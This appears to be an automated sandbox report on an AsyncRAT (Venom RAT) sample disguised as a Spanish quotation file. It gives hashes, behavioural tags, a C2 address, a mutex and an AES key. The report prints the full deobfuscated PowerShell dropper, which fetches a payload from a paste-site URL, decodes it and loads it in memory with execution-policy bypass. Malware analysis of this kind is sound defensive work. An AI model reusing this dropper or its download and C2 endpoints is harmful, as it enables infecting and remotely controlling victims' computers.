asyncrat

General

Target

COTIZACI�N_23-5_Pdf.7z
Size

4KB
Sample

250331-rae9zatny6
MD5

1a2e0d01b1a88be24a9450a16127e101
SHA1

eefed23d4e1cf044dc5b2594de4c0bd61bb6189b
SHA256

c8745638f7e73d20f8637b0b64dc8db76ec128acfc62991a5fc57f82369a56d7
SHA512

8d2b497885787c980129db665a5f99fc8a245fed9964f747680b0cf728c6cf12f88c3e979bab1ecb8dc905716eeaea7a4f54dff2248fcaee61240acafe3c17f7
SSDEEP

96:MRcCVQz2VOuaC5oVpp8HPIFO+7eAdzKWz6PS8m:AdVQwOualp8vIFO+RHXh

Score

10^/10

Malware Config

Extracted

Language

ps1

Deobfuscated

1

[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12

2

$zfkaa = "https://textbin.net/raw/ezjmofz3s6"

3

$iepgq = [system.io.path]::gettemppath() + "dll01.txt"

4

$webclient = new-object system.net.webclient

5

$rvuxv = $webclient.downloadstring("https://textbin.net/raw/ezjmofz3s6")

6

$rvuxv|out-file -filepath $iepgq -encoding "UTF8" -force

7

$stfgl = [system.io.path]::gettemppath() + "dll02.txt"

8

$phrln = new-object system.net.webclient

9

$phrln.encoding = [system.text.encoding]::ascii

10

$dhzua = get-content -path $iepgq

11

$utlhz = $phrln.downloadstring($dhzua)

12

$utlhz|out-file -filepath $stfgl -force

13

$modrg = "$ryaeG = (Get-Content -Path '" + $stfgl + "' -Encoding UTF8);"

14

$modrg = "[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace('$$$$','A') ) ;"

15

$modrg = "[System.AppDomain]::CurrentDomain.Load( $Fyfdz )."

16

$modrg = "GetType( 'MisericordiosoAmen.Class1' ).GetM"

17

$modrg = "ethod( 'MsqBIbY' ).Invoke( $null , [object[]] ( '0/XQ40JuJO/r/ee.etsap//:sptth' , 'C:\\Users\\Admin\\AppData\\Local\\Temp\\COTIZACIÓN_23-5_Pdf.vbs' , '____________________________________________-------', '0134', '1', 'Roda' ) ) ;"

18

$vbwwz = [system.io.path]::gettemppath() + "dll03.ps1"

19

$modrg|out-file -filepath $vbwwz -force

20

powershell -executionpolicy bypass -file $vbwwz

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

196.251.89.167:6900

Mutex

vcbkomkyscjsqqkd

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

1
tyWE2hYW1GHz2HI9Pm5puDdBPIk7SWZ5

Targets

- Target
  
  COTIZACIÓN_23-5_Pdf.vbs
- Size
  
  8.5MB
- MD5
  
  60ec698e60d2fb823393bc2ee1664742
- SHA1
  
  4c632c11036d0eec042d9eddb2b351ae2ed3caf4
- SHA256
  
  19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
- SHA512
  
  e2e179b5444aa9fab84cb939a4864289bb61a4d2198a07e920eac9de5c1a210771f190b8d7470224007ec4b7d9442b37dfff8d2023258516960b207070c03e6f
- SSDEEP
  
  96:5JTmIl/6GLHWtZdJ7AZPFZI6kNl5C+VwX2vR5VU3hOGIAKJV2T45aBSSFfkD:TllyjjdVMFZNkNls2vv8hAJJV8ve
Score

10^/10

asyncrat default defense_evasion discovery execution persistence rat
- AsyncRat
  AsyncRAT is designed to remotely monitor and control other computers written in C#.
  rat asyncrat
- Asyncrat family
  asyncrat
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
  Using powershell.exe command.
  execution
- Checks computer location settings
  Looks up country code configured in the registry, likely geofence.
- Drops startup file
- Adds Run key to start application
  persistence
- Hide Artifacts: Hidden Window
  Windows that would typically be displayed when an application carries out an operation can be hidden.
  defense_evasion
- Suspicious use of SetThreadContext
behavioral1